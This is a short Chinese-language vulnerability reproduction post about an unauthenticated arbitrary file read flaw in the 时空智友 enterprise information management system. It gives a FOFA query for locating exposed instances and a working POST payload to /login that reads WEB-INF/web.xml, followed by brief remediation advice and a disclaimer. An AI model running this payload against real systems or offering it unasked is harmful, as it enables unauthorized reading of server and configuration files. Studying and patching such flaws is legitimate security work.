时空智友企业信息管理系统任意文件读取漏洞复现

简介

时空智友企业信息管理系统是一个用于企业流程管理和控制的软件系统。它旨在帮助企业实现流程的规范化、自动化和优化,从而提高工作效率、降低成本并提升管理水平。

时空智友企业信息管理系统存在任意文件读取漏洞,攻击者可以在未授权的情况下读取系统上的文件。

漏洞复现

FOFA语法:

body="时空智友企业信息管理"

时空智友企业信息管理系统任意文件读取漏洞复现_第1张图片

访问页面如下所示:

时空智友企业信息管理系统任意文件读取漏洞复现_第2张图片

POC:

POST请求/login:op=verify%7Clogin&targetpage=&errorpage=WEB-INF/web.xml

时空智友企业信息管理系统任意文件读取漏洞复现_第3张图片

返回信息如下:

时空智友企业信息管理系统任意文件读取漏洞复现_第4张图片

成功读取到WEB-INF/web.xml该文件

修复建议

在应用程序中对用户输入进行验证

确保应用程序只能访问必要的文件和目录,并限制应用程序的访问权限

对敏感文件进行加密

免责声明

文章仅做经验分享用途,切勿当真,利用本文章所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任,一旦造成后果请自行承担!!!
 


结语

没有人规定,一朵花一定要成长为向日葵或者玫瑰。

你可能感兴趣的:(漏洞复现,安全,web安全)